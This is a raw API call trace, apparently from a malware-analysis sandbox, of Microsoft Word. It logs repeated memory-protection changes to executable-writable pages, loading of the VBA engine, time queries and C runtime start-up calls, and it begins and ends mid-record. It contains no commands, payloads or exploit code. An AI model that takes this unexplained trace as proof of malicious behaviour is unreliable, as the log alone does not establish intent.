GetCurrentProcess () returned 0xffffffff [0119.932] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0119.932] GetCurrentProcess () returned 0xffffffff [0119.932] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0119.932] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.933] GetCurrentProcess () returned 0xffffffff [0119.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0119.933] GetCurrentProcess () returned 0xffffffff [0119.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0119.933] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.933] GetCurrentProcess () returned 0xffffffff [0119.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0119.933] GetCurrentProcess () returned 0xffffffff [0119.933] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0119.933] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.934] GetCurrentProcess () returned 0xffffffff [0119.934] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0119.934] GetCurrentProcess () returned 0xffffffff [0119.934] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0119.934] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.935] GetCurrentProcess () returned 0xffffffff [0119.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0119.935] GetCurrentProcess () returned 0xffffffff [0119.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0119.935] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.935] GetCurrentProcess () returned 0xffffffff [0119.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0119.935] GetCurrentProcess () returned 0xffffffff [0119.935] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0119.935] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.936] GetCurrentProcess () returned 0xffffffff [0119.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0119.936] GetCurrentProcess () returned 0xffffffff [0119.936] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0119.936] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.937] GetCurrentProcess () returned 0xffffffff [0119.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0119.937] GetCurrentProcess () returned 0xffffffff [0119.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0119.937] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.937] GetCurrentProcess () returned 0xffffffff [0119.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0119.937] GetCurrentProcess () returned 0xffffffff [0119.937] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0119.937] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.969] GetCurrentProcess () returned 0xffffffff [0119.969] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0119.971] GetCurrentProcess () returned 0xffffffff [0119.971] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0119.971] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.985] GetCurrentProcess () returned 0xffffffff [0119.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0119.985] GetCurrentProcess () returned 0xffffffff [0119.985] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0119.985] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.986] GetCurrentProcess () returned 0xffffffff [0119.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0119.986] GetCurrentProcess () returned 0xffffffff [0119.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0119.986] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.986] GetCurrentProcess () returned 0xffffffff [0119.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0119.986] GetCurrentProcess () returned 0xffffffff [0119.986] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0119.986] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.987] GetCurrentProcess () returned 0xffffffff [0119.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0119.987] GetCurrentProcess () returned 0xffffffff [0119.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0119.987] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.987] GetCurrentProcess () returned 0xffffffff [0119.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0119.987] GetCurrentProcess () returned 0xffffffff [0119.987] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0119.988] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.988] GetCurrentProcess () returned 0xffffffff [0119.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0119.988] GetCurrentProcess () returned 0xffffffff [0119.988] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0119.988] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.989] GetCurrentProcess () returned 0xffffffff [0119.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0119.989] GetCurrentProcess () returned 0xffffffff [0119.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0119.989] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.989] GetCurrentProcess () returned 0xffffffff [0119.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0119.989] GetCurrentProcess () returned 0xffffffff [0119.989] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0119.989] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.990] GetCurrentProcess () returned 0xffffffff [0119.990] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0119.990] GetCurrentProcess () returned 0xffffffff [0119.990] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0119.990] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.990] GetCurrentProcess () returned 0xffffffff [0119.990] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0119.990] GetCurrentProcess () returned 0xffffffff [0119.990] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0119.990] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.991] GetCurrentProcess () returned 0xffffffff [0119.991] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0119.991] GetCurrentProcess () returned 0xffffffff [0119.991] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0119.991] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.992] GetCurrentProcess () returned 0xffffffff [0119.992] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0119.992] GetCurrentProcess () returned 0xffffffff [0119.992] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0119.992] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.992] GetCurrentProcess () returned 0xffffffff [0119.992] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0119.992] GetCurrentProcess () returned 0xffffffff [0119.992] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0119.992] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.993] GetCurrentProcess () returned 0xffffffff [0119.993] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0119.993] GetCurrentProcess () returned 0xffffffff [0119.993] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0119.993] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0119.993] GetCurrentProcess () returned 0xffffffff [0119.994] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0119.994] SetErrorMode (uMode=0x8001) returned 0x8001 [0119.994] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0119.994] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0119.994] SetErrorMode (uMode=0x8001) returned 0x8001 [0119.995] GetProcAddress (hModule=0x693e0000, lpProcName=0x217) returned 0x693e741e [0119.996] GetAsyncKeyState (vKey=3) returned 0 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.996] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0119.996] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x22, wSecond=0xb, wMilliseconds=0x39c)) [0119.997] VarAdd (in: pvarLeft=0x197ef0, pvarRight=0x197ee0, pvarResult=0x197ed0 | out: pvarResult=0x197ed0) returned 0x0 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0119.997] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0119.997] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x22, wSecond=0xb, wMilliseconds=0x39c)) [0120.191] NtdllDefWindowProc_A (hWnd=0x30334, Msg=0x1c, wParam=0x1, lParam=0x0) returned 0x0 [0121.727] NtdllDefWindowProc_A (hWnd=0x30334, Msg=0xc208, wParam=0x50, lParam=0x0) returned 0x0 [0122.223] NtdllDefWindowProc_A (hWnd=0x30334, Msg=0xc208, wParam=0x50, lParam=0x0) returned 0x0 [0123.243] NtdllDefWindowProc_A (hWnd=0x30334, Msg=0x1c, wParam=0x0, lParam=0x1090) returned 0x0 [0124.524] GetModuleHandleW (lpModuleName=0x0) returned 0x900000 [0124.525] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0124.525] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0124.526] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x769cd740 [0124.526] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0124.527] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x769d4490 [0124.527] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769cd7a0 [0124.527] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0124.528] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x769cd740 [0124.529] GetProcessHeap () returned 0x5c0000 [0124.529] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0124.529] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x769d4490 [0124.530] GetLastError () returned 0x3f0 [0124.530] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x769bf350 [0124.530] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x364) returned 0xcbdbfb8 [0124.531] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769cd7a0 [0124.531] SetLastError (dwErrCode=0x3f0) [0124.531] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xc00) returned 0xcbe4638 [0124.533] GetStartupInfoW (in: lpStartupInfo=0x19761c | out: lpStartupInfo=0x19761c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x11f196a0, hStdOutput=0xaab7ba3e, hStdError=0xfffffffe)) [0124.533] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0124.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0124.533] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0124.533] GetCommandLineA () returned="\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0124.533] GetCommandLineW () returned="\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" [0124.533] GetLastError () returned 0x3f0 [0124.533] SetLastError (dwErrCode=0x3f0) [0124.533] GetLastError () returned 0x3f0 [0124.533] SetLastError (dwErrCode=0x3f0) [0124.533] GetACP () returned 0x4e4 [0124.533] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x220) returned 0xc945238 [0124.533] IsValidCodePage (CodePage=0x4e4) returned 1 [0124.533] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19764c | out: lpCPInfo=0x19764c) returned 1 [0124.533] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x196f14 | out: lpCPInfo=0x196f14) returned 1 [0124.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0124.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196cb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0124.533] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x196f28 | out: lpCharType=0x196f28) returned 1 [0124.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0124.533] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x196c68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0124.533] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x76910000 [0124.534] GetProcAddress (hModule=0x76910000, lpProcName="LCMapStringEx") returned 0x769b95f0 [0124.535] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0124.535] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x196a58, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0124.535] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x197428, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿb\x90Y»dv\x19", lpUsedDefaultChar=0x0) returned 256 [0124.535] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x197528, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0124.535] 